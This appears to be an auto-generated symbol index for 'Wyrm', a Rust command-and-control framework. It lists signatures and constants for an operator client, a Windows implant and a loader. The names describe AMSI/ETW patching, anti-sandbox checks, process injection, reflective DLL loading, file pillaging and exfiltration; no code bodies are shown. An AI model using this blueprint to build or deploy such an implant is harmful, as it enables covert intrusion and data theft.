  constant C2_STORAGE_KEY (line 12) | pub const C2_STORAGE_KEY: &str = "WYRM_C2_ADDR";
  constant TAB_STORAGE_KEY (line 13) | pub const TAB_STORAGE_KEY: &str = "WYRM_C2_TABS";

FILE: client/src/net.rs
  type IsTaskingAgent (line 14) | pub enum IsTaskingAgent {
    method has_agent_id (line 26) | pub fn has_agent_id(&self) -> Result<(), IsTaskingAgentErr> {
  type IsTaskingAgentErr (line 20) | pub enum IsTaskingAgentErr {
  type C2Url (line 35) | pub enum C2Url {
    method get (line 47) | fn get(&self) -> anyhow::Result<String> {
  function api_request (line 70) | pub async fn api_request(
  function prepare_body_data (line 119) | fn prepare_body_data(input: AdminCommand, creds: Option<(String, String)...
  function make_post (line 133) | async fn make_post(c2_url: &str, body: Value) -> Result<Response, ApiErr...
  function construct_c2_url (line 143) | fn construct_c2_url(
  type ApiError (line 185) | pub enum ApiError {
  function admin_health_check (line 193) | pub async fn admin_health_check() -> bool {

FILE: client/src/pages/build_profiles.rs
  function BuildProfilesPage (line 11) | pub fn BuildProfilesPage() -> impl IntoView {

FILE: client/src/pages/dashboard.rs
  function Dashboard (line 26) | pub fn Dashboard() -> impl IntoView {
  function ConnectedAgents (line 49) | fn ConnectedAgents(tabs: RwSignal<ActiveTabs>) -> impl IntoView {
  function MiddleTabBar (line 164) | fn MiddleTabBar() -> impl IntoView {
  function MessagePanel (line 242) | fn MessagePanel() -> impl IntoView {
  function CommandInput (line 393) | fn CommandInput() -> impl IntoView {

FILE: client/src/pages/file_upload.rs
  function FileUploadPage (line 16) | pub fn FileUploadPage() -> impl IntoView {

FILE: client/src/pages/logged_in_headers.rs
  function LoggedInHeaders (line 12) | pub fn LoggedInHeaders() -> impl IntoView {
  function extract_path (line 113) | fn extract_path() -> Option<String> {
  function create_url_path_signal (line 126) | fn create_url_path_signal() -> RwSignal<String> {

FILE: client/src/pages/login.rs
  function Login (line 12) | pub fn Login() -> impl IntoView {

FILE: client/src/pages/logout.rs
  function Logout (line 9) | pub fn Logout() -> impl IntoView {

FILE: client/src/pages/staged_resources.rs
  type StagedResourcesRowInner (line 11) | pub struct StagedResourcesRowInner {
  function StagedResourcesPage (line 18) | pub fn StagedResourcesPage() -> impl IntoView {

FILE: client/src/tasks/task_dispatch.rs
  type TaskingError (line 20) | pub enum TaskingError {
  type DispatchResult (line 34) | pub type DispatchResult = Result<Option<Vec<u8>>, TaskingError>;
  function dispatch_task (line 37) | pub async fn dispatch_task(input: String, agent: IsTaskingAgent) -> Disp...
  function dispatcher (line 66) | async fn dispatcher(tokens: Vec<&str>, raw_input: String, agent: IsTaski...

FILE: client/src/tasks/task_impl.rs
  type TaskDispatchError (line 25) | pub enum TaskDispatchError {
  function list_processes (line 36) | pub async fn list_processes(agent: &IsTaskingAgent) -> DispatchResult {
  function change_directory (line 51) | pub async fn change_directory(new_dir: &[&str], agent: &IsTaskingAgent) ...
  function kill_agent (line 68) | pub async fn kill_agent(agent: &IsTaskingAgent) -> DispatchResult {
  function kill_process (line 83) | pub async fn kill_process(agent: &IsTaskingAgent, pid: &&str) -> Dispatc...
  function copy_file (line 111) | pub async fn copy_file(raw_input: String, agent: &IsTaskingAgent) -> Dis...
  function move_file (line 144) | pub async fn move_file(raw_input: String, agent: &IsTaskingAgent) -> Dis...
  type FileOperationTarget (line 172) | pub enum FileOperationTarget {
  function remove_file (line 177) | pub async fn remove_file(
  function pull_file (line 220) | pub async fn pull_file(target: String, agent: &IsTaskingAgent) -> Dispat...
  function remove_agent (line 248) | pub async fn remove_agent(agent: &IsTaskingAgent) -> DispatchResult {
  function unknown_command (line 270) | pub fn unknown_command() -> DispatchResult {
  function set_sleep (line 286) | pub async fn set_sleep(sleep_time: &str, agent: &IsTaskingAgent) -> Disp...
  function clear_terminal (line 321) | pub async fn clear_terminal(agent: &IsTaskingAgent) -> DispatchResult {
  function pwd (line 345) | pub async fn pwd(agent: &IsTaskingAgent) -> DispatchResult {
  function export_db (line 353) | pub async fn export_db(agent: &IsTaskingAgent) -> DispatchResult {
  function dir_listing (line 361) | pub async fn dir_listing(agent: &IsTaskingAgent) -> DispatchResult {
  function show_server_time (line 369) | pub async fn show_server_time() -> DispatchResult {
  function pillage (line 399) | pub async fn pillage(agent: &IsTaskingAgent) -> DispatchResult {
  function show_help (line 415) | pub async fn show_help(agent: &IsTaskingAgent) -> DispatchResult {
  function show_help_for_command (line 471) | pub async fn show_help_for_command(agent: &IsTaskingAgent, command: &str...
  function run_powershell_command (line 545) | pub async fn run_powershell_command(args: &[&str], agent: &IsTaskingAgen...
  function file_dropper (line 569) | pub async fn file_dropper(args: &[&str], agent: &IsTaskingAgent) -> Disp...
  type RegOperationDelQuery (line 623) | pub enum RegOperationDelQuery {
  function reg_query_del (line 631) | pub async fn reg_query_del(
  function reg_add (line 701) | pub async fn reg_add(inputs: String, agent: &IsTaskingAgent) -> Dispatch...
  function dotex (line 763) | pub async fn dotex(inputs: String, agent: &IsTaskingAgent) -> DispatchRe...
  function whoami (line 799) | pub async fn whoami(agent: &IsTaskingAgent) -> DispatchResult {
  function spawn (line 807) | pub async fn spawn(raw_input: String, agent: &IsTaskingAgent) -> Dispatc...
  function run_static_wof (line 830) | pub async fn run_static_wof(agent: &IsTaskingAgent, raw_input: String) -...
  function inject (line 873) | pub async fn inject(agent: &IsTaskingAgent, raw_input: String) -> Dispat...

FILE: client/src/tasks/utils.rs
  function split_string_slices_to_n (line 31) | pub fn split_string_slices_to_n(
  type DiscardFirst (line 96) | pub enum DiscardFirst {
  function tokens_with_no_quotes (line 107) | fn tokens_with_no_quotes() {
  function tokens_with_quotes_space (line 124) | fn tokens_with_quotes_space() {
  function tokens_with_quotes (line 138) | fn tokens_with_quotes() {
  function tokens_bad_count (line 152) | fn tokens_bad_count() {
  function validate_reg_type (line 161) | pub fn validate_reg_type(input: &str, reg_type: RegType) -> Result<(), (...

FILE: implant/build.rs
  function main (line 10) | fn main() {
  function write_exports_to_build_dir (line 44) | fn write_exports_to_build_dir() {
  function build_static_wofs (line 101) | fn build_static_wofs() {
  function add_symbols (line 163) | fn add_symbols(src: &Path, ffi_builder: &mut String, lookup_builder: &mu...
  type ArgsPerFolder (line 175) | struct ArgsPerFolder {
  function parse_wof_directories (line 198) | fn parse_wof_directories() -> std::io::Result<Option<Vec<ArgsPerFolder>>> {
  function dump_symbols (line 258) | fn dump_symbols(lib: &Path) -> Option<Vec<String>> {

FILE: implant/src/anti_sandbox/memory.rs
  constant MIN_ACCEPTABLE_MEMORY (line 5) | const MIN_ACCEPTABLE_MEMORY: u64 = 4000000;
  function validate_ram_sz_or_panic (line 10) | pub fn validate_ram_sz_or_panic() {

FILE: implant/src/anti_sandbox/mod.rs
  function anti_sandbox (line 9) | pub fn anti_sandbox() {

FILE: implant/src/anti_sandbox/trig.rs
  constant MAX_WAIT_TIME_SECONDS (line 14) | const MAX_WAIT_TIME_SECONDS: u64 = 5 * 60;
  function trig_mouse_movements (line 29) | pub fn trig_mouse_movements() {
  function get_pos (line 105) | fn get_pos(point: &mut POINT, live_timer: &(Instant, Duration)) {

FILE: implant/src/comms.rs
  constant MAX_RESPONSE_SZ_BYTES (line 33) | const MAX_RESPONSE_SZ_BYTES: u64 = 1024 * 1024 * 500;
  function construct_c2_url (line 36) | pub fn construct_c2_url(implant: &Wyrm) -> String {
  function comms_http_check_in (line 77) | pub fn comms_http_check_in(implant: &mut Wyrm) -> Result<Vec<Task>, ureq...
  function http_get (line 131) | fn http_get(
  function http_post_tasks (line 149) | fn http_post_tasks(
  function generate_generic_headers (line 185) | fn generate_generic_headers(implant_id: &str, security_token: &str, ua: ...
  function read_body_with_limit (line 194) | fn read_body_with_limit(response: &mut Response<Body>) -> Result<Vec<u8>...
  function decode_tasks_stream (line 211) | pub fn decode_tasks_stream(byte_response: &[u8]) -> Vec<Task> {
  function configuration_connection (line 232) | pub fn configuration_connection(implant: &mut Wyrm) -> Result<Vec<Task>,...
  function download_file_with_uri_in_memory (line 279) | pub fn download_file_with_uri_in_memory(uri: &str, wyrm: &Wyrm) -> Resul...
  function upload_file_as_stream (line 290) | pub fn upload_file_as_stream(implant: &Wyrm, ef: &ExfiltratedFile) {
  function generate_http_agent (line 349) | fn generate_http_agent(implant: &Wyrm) -> Agent {

FILE: implant/src/entry.rs
  function start_wyrm (line 25) | pub fn start_wyrm() {
  function on_start_evasion (line 56) | fn on_start_evasion() {
  function first_check_in (line 69) | pub fn first_check_in(implant: &mut Wyrm) {

FILE: implant/src/evasion/amsi.rs
  function evade_amsi (line 24) | pub fn evade_amsi() -> bool {
  function amsi_patch_ntdll (line 49) | fn amsi_patch_ntdll() {
  function amsi_veh_squared (line 87) | fn amsi_veh_squared() -> bool {

FILE: implant/src/evasion/etw.rs
  function etw_bypass (line 12) | pub(super) fn etw_bypass() {
  function evade_etw_current_process_overwrite_ntdll (line 25) | fn evade_etw_current_process_overwrite_ntdll() -> Result<(), ExportResol...

FILE: implant/src/evasion/mod.rs
  function run_evasion (line 7) | pub fn run_evasion() {

FILE: implant/src/evasion/veh.rs
  function veh_handler (line 15) | pub(super) unsafe extern "system" fn veh_handler(p_ep: *mut EXCEPTION_PO...
  function addr_of_amsi_scan_buf (line 67) | pub(super) fn addr_of_amsi_scan_buf() -> Option<*const c_void> {

FILE: implant/src/execute/dotnet.rs
  type DotnetError (line 28) | pub enum DotnetError {
    method to_string (line 44) | fn to_string(&self) -> String {
  constant GUID_META_HOST (line 111) | const GUID_META_HOST: GUID = GUID {
  constant GUID_RIID (line 118) | const GUID_RIID: GUID = GUID {
  constant GUID_RNTIME_INFO (line 125) | const GUID_RNTIME_INFO: GUID = GUID {
  constant GUID_COR_RUNTIME (line 132) | const GUID_COR_RUNTIME: GUID = GUID {
  constant GUID_APP_DOMAIN (line 139) | const GUID_APP_DOMAIN: GUID = GUID {
  function execute_dotnet_current_process (line 150) | pub fn execute_dotnet_current_process(metadata: &Option<String>) -> Wyrm...
  function execute_dotnet_assembly (line 175) | fn execute_dotnet_assembly(buf: &[u8], args: &[String]) -> Result<String...
  function make_params (line 250) | fn make_params(args: &[String]) -> Result<*mut SAFEARRAY, DotnetError> {
  function args_to_safe_array (line 291) | fn args_to_safe_array(args: &[String]) -> Result<*mut SAFEARRAY, DotnetE...
  function create_safe_array (line 329) | fn create_safe_array(buf: &[u8]) -> Result<*mut SAFEARRAY, DotnetError> {
  function create_clr_instance (line 350) | fn create_clr_instance() -> Result<*mut ICLRMetaHost, DotnetError> {
  function get_runtime_v4 (line 362) | fn get_runtime_v4(meta: *mut ICLRMetaHost) -> Result<*mut ICLRRuntimeInf...
  function get_cor_runtime_host (line 376) | fn get_cor_runtime_host(
  function start_runtime (line 390) | fn start_runtime(host: *mut ICorRuntimeHost) -> Result<(), DotnetError> {
  function get_default_appdomain (line 401) | fn get_default_appdomain(host: *mut ICorRuntimeHost) -> Result<*mut _App...

FILE: implant/src/execute/ffi.rs
  type IUnknownVtbl (line 12) | pub struct IUnknownVtbl {
  type IUnknown (line 23) | pub struct IUnknown {
  type ICLRMetaHostVtbl (line 28) | pub struct ICLRMetaHostVtbl {
  type ICLRMetaHost (line 46) | pub struct ICLRMetaHost {
  type ICorRuntimeHost (line 51) | pub struct ICorRuntimeHost {
  type ICorRuntimeHostVtbl (line 56) | pub struct ICorRuntimeHostVtbl {
  type ICLRRuntimeInfo (line 117) | pub struct ICLRRuntimeInfo {
  type ICLRRuntimeInfoVtbl (line 122) | pub struct ICLRRuntimeInfoVtbl {
  type _AppDomain (line 184) | pub struct _AppDomain {
  type _AppDomainVtbl (line 189) | pub struct _AppDomainVtbl {
  type _Assembly (line 267) | pub struct _Assembly {
  type _AssemblyVtbl (line 272) | pub struct _AssemblyVtbl {
  type _MethodInfo (line 335) | pub struct _MethodInfo {
  type _MethodInfoVtbl (line 340) | pub struct _MethodInfoVtbl {

FILE: implant/src/lib.rs
  function DllMain (line 33) | unsafe extern "system" fn DllMain(_hmod_instance: HINSTANCE, dw_reason: ...
  function Start (line 45) | unsafe extern "system" fn Start() {

FILE: implant/src/main.rs
  function main (line 25) | fn main() {

FILE: implant/src/main_svc.rs
  function ServiceMain (line 56) | pub unsafe extern "system" fn ServiceMain(_: u32, _: *mut PWSTR) {
  function svc_start (line 60) | fn svc_start() {
  function service_handler (line 76) | unsafe extern "system" fn service_handler(control: u32) {
  function main (line 86) | fn main() {

FILE: implant/src/native/accounts.rs
  function get_logged_in_username (line 33) | pub fn get_logged_in_username() -> Option<impl Serialize> {
  type ProcessIntegrityLevel (line 58) | pub enum ProcessIntegrityLevel {
  method fmt (line 68) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  function get_process_integrity_level (line 80) | pub fn get_process_integrity_level() -> Option<ProcessIntegrityLevel> {
  function whoami (line 147) | pub fn whoami() -> Option<impl Serialize> {
  function format_token_permissions (line 248) | fn format_token_permissions(h_tok: *mut c_void) -> WyrmResult<String> {
  function luid_to_name (line 299) | fn luid_to_name(luid: &LUID) -> String {
  function attrs_to_state (line 324) | fn attrs_to_state(attrs: u32) -> &'static str {
  function lookup_account_sid_w (line 336) | fn lookup_account_sid_w(psid: PSID) -> Result<(String, String), u32> {

FILE: implant/src/native/filesystem.rs
  function pillage (line 18) | pub fn pillage() -> Option<impl Serialize> {
  function get_file_listings_from_dir_and_subdirs (line 36) | fn get_file_listings_from_dir_and_subdirs(
  function dir_listing (line 98) | pub fn dir_listing(cwd: &Path) -> Option<impl Serialize + use<>> {
  type MoveCopyAction (line 140) | pub enum MoveCopyAction {
  function move_or_copy_file (line 148) | pub fn move_or_copy_file(
  function rm_from_fs (line 217) | pub fn rm_from_fs(
  function drop_file_to_disk (line 259) | pub fn drop_file_to_disk(
  function change_directory (line 302) | pub fn change_directory(
  type PathParseType (line 353) | pub enum PathParseType {
  function parse_path (line 360) | pub fn parse_path(
  function pull_file (line 464) | pub fn pull_file(

FILE: implant/src/native/processes.rs
  function running_process_details (line 31) | pub fn running_process_details() -> Option<impl Serialize> {
  function get_pids (line 45) | fn get_pids() -> Result<Vec<u32>, u32> {
  function lookup_process_name (line 93) | fn lookup_process_name(handle: HANDLE, pid: u32) -> String {
  function lookup_process_owner_name (line 121) | fn lookup_process_owner_name(pid: u32) -> String {
  function kill_process (line 247) | pub fn kill_process(pid: &Task) -> Option<WyrmResult<String>> {
  function enum_all_processes (line 279) | fn enum_all_processes() -> Option<Vec<Process>> {

FILE: implant/src/native/registry.rs
  function reg_query (line 14) | pub fn reg_query(raw_input: &Option<String>) -> Option<impl Serialize> {
  function reg_del (line 45) | pub fn reg_del(raw_input: &Option<String>) -> Option<impl Serialize> {
  function reg_add (line 72) | pub fn reg_add(raw_input: &Option<String>) -> Option<impl Serialize> {
  function query_key_plus_value (line 177) | fn query_key_plus_value(path: String, value: String) -> Option<WyrmResul...
  function query_key (line 217) | fn query_key(path: String) -> Option<WyrmResult<String>> {
  function value_to_string (line 283) | fn value_to_string(data: &Value) -> String {
  function val_u32_to_str (line 295) | fn val_u32_to_str(value: &Value) -> String {
  function val_u64_to_str (line 299) | fn val_u64_to_str(value: &Value) -> String {
  function val_bytes_to_str (line 303) | fn val_bytes_to_str(value: &Value) -> String {
  function val_string_to_str (line 316) | fn val_string_to_str(value: &[u8]) -> String {
  function strip_hive (line 325) | fn strip_hive<'a>(path: &'a str) -> Result<&'a str, RegistryError> {
  function extract_hive_from_str (line 335) | fn extract_hive_from_str<'a>(path: &'a str) -> Result<&'a Key, RegistryE...
  type RegistryError (line 356) | pub enum RegistryError {
  function get_key_strip_hive (line 360) | fn get_key_strip_hive<'a>(path: &'a str) -> Option<(&'a Key, &'a str)> {
  function delete_key (line 376) | fn delete_key(path: String) -> Option<WyrmResult<String>> {
  function delete_reg_value (line 399) | fn delete_reg_value(path: String, value: String) -> Option<WyrmResult<St...

FILE: implant/src/native/shell.rs
  function run_powershell (line 8) | pub fn run_powershell(command: &Option<String>, implant: &Wyrm) -> Optio...

FILE: implant/src/spawn_inject/early_cascade.rs
  function early_cascade_spawn_child (line 29) | pub(super) fn early_cascade_spawn_child(mut buf: Vec<u8>, spawn_as: &str...
  function execute_early_cascade (line 174) | fn execute_early_cascade(
  function write_image_rw (line 241) | fn write_image_rw(h_process: HANDLE, buf: &mut Vec<u8>) -> Result<*const...
  function encode_system_ptr (line 285) | fn encode_system_ptr(ptr: *const c_void) -> *const c_void {

FILE: implant/src/spawn_inject/injection.rs
  function virgin_inject (line 23) | pub fn virgin_inject(buf: &[u8], pid: u32) -> WyrmResult<String> {

FILE: implant/src/spawn_inject/mod.rs
  type SpawnMethod (line 10) | pub enum SpawnMethod {
  type InjectMethod (line 14) | pub enum InjectMethod {
  type Inject (line 19) | pub struct Inject;
    method inject_wyrm (line 22) | pub fn inject_wyrm(buf: &[u8], method: InjectMethod, pid: u32) -> Wyrm...
  type Spawn (line 29) | pub struct Spawn;
    method spawn_child (line 32) | pub fn spawn_child(buf: Vec<u8>, method: SpawnMethod, spawn_as: &str) ...

FILE: implant/src/stubs/rdi.rs
  type VirtualAlloc (line 43) | type VirtualAlloc = unsafe extern "system" fn(
  type LoadLibraryA (line 50) | type LoadLibraryA = unsafe extern "system" fn(PCSTR) -> HMODULE;
  type VirtualProtect (line 52) | type VirtualProtect = unsafe extern "system" fn(
  type GetProcAddress (line 59) | type GetProcAddress = unsafe extern "system" fn(HMODULE, PCSTR) -> FARPROC;
  type FlushInstructionCache (line 61) | type FlushInstructionCache =
  type GetCurrentProcess (line 64) | type GetCurrentProcess = unsafe extern "system" fn() -> HANDLE;
  type RdiExports (line 68) | struct RdiExports {
    method new (line 84) | fn new() -> Option<Self> {
  type RdiErrorCodes (line 144) | enum RdiErrorCodes {
  function Load (line 156) | pub unsafe extern "system" fn Load(image_base: *mut c_void) -> u32 {
  function relocate_and_commit (line 259) | fn relocate_and_commit(
  function process_relocations (line 335) | fn process_relocations(
  function patch_iat (line 412) | fn patch_iat(
  function get_addr_as_rva (line 486) | fn get_addr_as_rva<T>(base_ptr: *mut u8, offset: usize) -> *mut T {
  function write_payload (line 491) | fn write_payload(
  function nostd_patch_etw_current_process (line 533) | fn nostd_patch_etw_current_process(exports: &RdiExports) {
  function calculate_image_base (line 565) | fn calculate_image_base() -> Option<*mut c_void> {
  function is_valid_pe_base (line 585) | fn is_valid_pe_base(addr: usize) -> bool {

FILE: implant/src/stubs/shim.rs
  type ShimHardReturnErrors (line 11) | enum ShimHardReturnErrors {
  type NtQueueApcThread (line 18) | type NtQueueApcThread = unsafe extern "system" fn(
  function Shim (line 30) | pub extern "system" fn Shim() -> u32 {

FILE: implant/src/utils/allocate.rs
  type ProcessHeapAlloc (line 6) | pub struct ProcessHeapAlloc;
  method alloc (line 9) | unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
  method alloc_zeroed (line 12) | unsafe fn alloc_zeroed(&self, layout: Layout) -> *mut u8 {
  method dealloc (line 15) | unsafe fn dealloc(&self, ptr: *mut u8, _layout: Layout) {
  method realloc (line 20) | unsafe fn realloc(&self, ptr: *mut u8, _layout: Layout, new_size: usize)...

FILE: implant/src/utils/comptime.rs
  type SleepSeconds (line 7) | pub type SleepSeconds = u64;
  type ApiEndpoint (line 8) | pub type ApiEndpoint = Vec<String>;
  type SecurityToken (line 9) | pub type SecurityToken = String;
  type Useragent (line 10) | pub type Useragent = String;
  type Port (line 11) | pub type Port = u16;
  type URL (line 12) | pub type URL = String;
  type AgentNameByOperator (line 13) | pub type AgentNameByOperator = String;
  type Jitter (line 14) | pub type Jitter = u64;
  type WinGlobalMutex (line 15) | pub type WinGlobalMutex = String;
  type SpawnAs (line 16) | pub type SpawnAs = String;
  constant SPAWN_AS_IMAGE_FALLBACK (line 18) | const SPAWN_AS_IMAGE_FALLBACK: &str = "C:\\Windows\\System32\\svchost.exe";
  function translate_build_artifacts (line 22) | pub fn translate_build_artifacts() -> (

FILE: implant/src/utils/console.rs
  function get_console_log (line 26) | pub fn get_console_log() -> &'static Mutex<Vec<u8>> {
  function init_agent_console (line 30) | pub fn init_agent_console() {
  function start_stdout_reader_thread (line 76) | fn start_stdout_reader_thread() {
  function thread_loop (line 80) | unsafe extern "system" fn thread_loop(_: *mut c_void) -> u32 {
  function print_success (line 134) | pub fn print_success(msg: impl Display) {
  function print_info (line 139) | pub fn print_info(msg: impl Display) {
  function print_failed (line 144) | pub fn print_failed(msg: impl Display) {

FILE: implant/src/utils/export_comptime.rs
  function internal_dll_start (line 33) | pub fn internal_dll_start(start_type: StartType) {
  function start_in_os_thread_no_mutex_check (line 57) | fn start_in_os_thread_no_mutex_check() {
  function runpoline (line 68) | unsafe extern "system" fn runpoline(_p1: *mut c_void) -> u32 {
  function start_in_os_thread_mutex_check (line 74) | fn start_in_os_thread_mutex_check() {
  function check_mutex (line 84) | fn check_mutex() -> Option<()> {
  type StartType (line 103) | pub enum StartType {

FILE: implant/src/utils/pe_stomp.rs
  function stomp_pe_header_bytes (line 5) | pub fn stomp_pe_header_bytes(buf: &mut Vec<u8>) {

FILE: implant/src/utils/proxy.rs
  type ProxyConfig (line 18) | pub struct ProxyConfig {
  type ProxyError (line 23) | pub enum ProxyError {
  function resolve_web_proxy (line 33) | pub fn resolve_web_proxy(implant: &Wyrm) -> Result<Option<ProxyConfig>, ...
  function global_free (line 227) | fn global_free(p: *mut c_void) {
  function winhttp_proxy_to_url (line 233) | fn winhttp_proxy_to_url(raw: &str, target_is_https: bool) -> Option<Stri...

FILE: implant/src/utils/strings.rs
  function utf_16_to_string_lossy (line 9) | pub unsafe fn utf_16_to_string_lossy(p_w_str: *const u16, num_chars: usi...
  function generate_mutex_name (line 20) | pub fn generate_mutex_name(mutex: &str) -> [u8; MAX_PATH as usize] {

FILE: implant/src/utils/svc_controls.rs
  function update_service_status (line 24) | pub unsafe fn update_service_status(h_status: SERVICE_STATUS_HANDLE, sta...
  function stop_svc_and_exit (line 42) | pub fn stop_svc_and_exit() -> ! {

FILE: implant/src/utils/time_utils.rs
  function epoch_now (line 3) | pub fn epoch_now() -> i64 {

FILE: implant/src/wofs/mod.rs
  type FfiShape (line 9) | type FfiShape = unsafe extern "C" fn(*const c_void) -> i32;
  function get_wof_fn_ptr (line 11) | fn get_wof_fn_ptr(needle: &str) -> Option<FfiShape> {
  function call_static_wof_no_arg (line 24) | pub fn call_static_wof_no_arg(fn_name: &str) -> WyrmResult<String> {
  function call_static_wof_with_arg (line 39) | pub fn call_static_wof_with_arg(fn_name: &str, arg: &str) -> WyrmResult<...

FILE: implant/src/wyrm.rs
  type RetriesBeforeExit (line 61) | pub struct RetriesBeforeExit {
  type Wyrm (line 68) | pub struct Wyrm {
    method new (line 98) | pub fn new() -> Self {
    method get_tasks_http (line 160) | pub fn get_tasks_http(&mut self) {
    method dispatch_tasks (line 177) | pub fn dispatch_tasks(&mut self) {
    method update_sleep_time (line 410) | fn update_sleep_time(&mut self, time_as_string: Option<String>) {
    method push_completed_task (line 450) | pub fn push_completed_task<T>(&mut self, task: &Task, data: Option<T>)
    method update_implant_sleep_time (line 502) | fn update_implant_sleep_time(&mut self, task: Task) {
    method conduct_first_run_recon (line 518) | pub fn conduct_first_run_recon(&mut self) {
    method try_get_proxy (line 563) | pub fn try_get_proxy(&self) -> Option<String> {
  type C2Config (line 86) | pub struct C2Config {
  function build_implant_id (line 574) | fn build_implant_id() -> String {
  function get_hostname (line 620) | pub fn get_hostname() -> String {
  function calculate_sleep_seconds (line 633) | pub fn calculate_sleep_seconds(wyrm: &Wyrm) -> u64 {
  type WyrmMutex (line 674) | struct WyrmMutex {
    method new (line 687) | fn new(mtx_name: &str) -> Option<Self> {
  method drop (line 745) | fn drop(&mut self) {

FILE: loader/build.rs
  constant ENCRYPTION_KEY (line 9) | const ENCRYPTION_KEY: u8 = 0x90;
  function main (line 11) | fn main() {
  function prepare_wyrm_dll (line 36) | fn prepare_wyrm_dll() {
  function write_exports_to_build_dir (line 72) | fn write_exports_to_build_dir() {

FILE: loader/src/export_comptime.rs
  function internal_dll_start (line 31) | pub fn internal_dll_start(start_type: StartType) {
  function start_in_os_thread_no_mutex_check (line 46) | fn start_in_os_thread_no_mutex_check() {
  function start_in_os_thread_mutex_check (line 57) | fn start_in_os_thread_mutex_check() {
  function runpoline (line 66) | unsafe extern "system" fn runpoline(_p1: *mut c_void) -> u32 {
  type StartType (line 73) | pub enum StartType {
  function check_mutex (line 79) | fn check_mutex() -> Option<()> {

FILE: loader/src/injector.rs
  constant DLL_BYTES (line 16) | const DLL_BYTES: &[u8] = include_bytes!(concat!(env!("OUT_DIR"), "/rdll_...
  constant ENCRYPTION_KEY (line 17) | const ENCRYPTION_KEY: u8 = 0x90;
  function inject_current_process (line 20) | pub fn inject_current_process() {
  function find_export_address (line 71) | fn find_export_address(
  function rva_from_file (line 121) | unsafe fn rva_from_file<T>(

FILE: loader/src/lib.rs
  function panic (line 14) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function DllMain (line 20) | unsafe extern "system" fn DllMain(_hmod_instance: HINSTANCE, dw_reason: ...

FILE: loader/src/main.rs
  function panic (line 11) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function main (line 16) | pub extern "C" fn main() -> i32 {

FILE: loader/src/main_svc.rs
  function panic (line 24) | fn panic(_info: &core::panic::PanicInfo) -> ! {
  function get_service_name_wide (line 30) | fn get_service_name_wide() -> [u16; 256] {
  function ServiceMain (line 49) | pub unsafe extern "system" fn ServiceMain(_: u32, _: *mut PWSTR) {
  function svc_start (line 53) | fn svc_start() {
  function service_handler (line 68) | unsafe extern "system" fn service_handler(control: u32) {
  function main (line 76) | pub extern "C" fn main() -> i32 {
  function update_service_status (line 96) | pub unsafe fn update_service_status(h_status: SERVICE_STATUS_HANDLE, sta...

FILE: loader/src/utils.rs
  function generate_mutex_name (line 9) | pub fn generate_mutex_name(mutex: &str) -> [u8; MAX_PATH as usize] {

FILE: shared/src/lib.rs
  type StagedResourceDataNoSqlx (line 9) | pub struct StagedResourceDataNoSqlx {

FILE: shared/src/net.rs
  constant NET_XOR_KEY (line 5) | const NET_XOR_KEY: u8 = 0x3d;
  constant STR_CRYPT_XOR_KEY (line 6) | pub const STR_CRYPT_XOR_KEY: u8 = 0x1f;
  constant ADMIN_AUTH_SEPARATOR (line 8) | pub const ADMIN_AUTH_SEPARATOR: &str = "=authdivider=";
  constant ADMIN_ENDPOINT (line 9) | pub const ADMIN_ENDPOINT: &str = "admin";
  constant ADMIN_LOGIN_ENDPOINT (line 10) | pub const ADMIN_LOGIN_ENDPOINT: &str = "admin_login";
  constant NOTIFICATION_CHECK_AGENT_ENDPOINT (line 12) | pub const NOTIFICATION_CHECK_AGENT_ENDPOINT: &str = "check_notifs";
  constant ADMIN_HEALTH_CHECK_ENDPOINT (line 14) | pub const ADMIN_HEALTH_CHECK_ENDPOINT: &str = "/adm/is_logged_in";
  type CompletedTasks (line 16) | pub type CompletedTasks = Vec<Vec<u16>>;
  type TasksNetworkStream (line 17) | pub type TasksNetworkStream = Vec<Vec<u8>>;
  type AdminLoginPacket (line 20) | pub struct AdminLoginPacket {
  type XorEncode (line 25) | pub trait XorEncode {
    method xor_network_stream (line 26) | fn xor_network_stream(self) -> Self;
    method xor_network_stream (line 30) | fn xor_network_stream(mut self) -> Self {
  function encode_u16buf_to_u8buf (line 39) | pub fn encode_u16buf_to_u8buf(input: &[u16]) -> Vec<u8> {
  function decode_u8buf_to_u16buf (line 51) | pub fn decode_u8buf_to_u16buf(input: &[u8]) -> Vec<u16> {
  function decode_http_response (line 64) | pub fn decode_http_response(byte_response: &[u8]) -> Task {

FILE: shared/src/stomped_structs.rs
  type Process (line 13) | pub struct Process {
  type RegQueryResult (line 26) | pub struct RegQueryResult {
    type Error (line 34) | type Error = Vec<String>;
    method try_from (line 36) | fn try_from(value: &str) -> Result<Self, Vec<String>> {
    method client_print_formatted (line 61) | pub fn client_print_formatted(&self) -> Vec<String> {

FILE: shared/src/task_types.rs
  type FileCopyInner (line 5) | pub type FileCopyInner = (String, String);
  type BuildAllBins (line 9) | pub type BuildAllBins = (String, String, String);
  type RegQueryInner (line 11) | pub type RegQueryInner = (String, Option<String>);
  type RegType (line 14) | pub enum RegType {
  type RegAddInner (line 29) | pub type RegAddInner = (String, String, String, RegType);
  type DotExDataForImplant (line 33) | pub type DotExDataForImplant = (Vec<u8>, Vec<String>);

FILE: shared/src/tasks.rs
  type Command (line 22) | pub enum Command {
    method into (line 142) | fn into(self) -> u32 {
    method from_u32 (line 148) | pub fn from_u32(id: u32) -> Self {
    method to_u16_tuple_le (line 153) | pub fn to_u16_tuple_le(&self) -> (u16, u16) {
    method is_autocomplete (line 161) | pub fn is_autocomplete(&self) -> bool {
  type FileDropMetadata (line 66) | pub struct FileDropMetadata {
    method into (line 75) | fn into(self) -> String {
    method from (line 116) | fn from(value: &str) -> Self {
  constant DELIM_FILE_DROP_METADATA (line 72) | pub const DELIM_FILE_DROP_METADATA: &str = ",";
  method fmt (line 171) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  type DotExInner (line 208) | pub struct DotExInner {
    method from (line 233) | pub fn from(tool_path: String, args: Vec<String>) -> Self {
  type InjectInnerForAdmin (line 216) | pub struct InjectInnerForAdmin {
  type InjectInnerForPayload (line 225) | pub struct InjectInnerForPayload {
  type AdminCommand (line 239) | pub enum AdminCommand {
  type Task (line 282) | pub struct Task {
    method from (line 290) | pub fn from(id: i32, command: Command, metadata: Option<String>) -> Se...
    method deserialise_metadata (line 301) | pub fn deserialise_metadata<'a, T: Deserialize<'a>>(
  method fmt (line 313) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
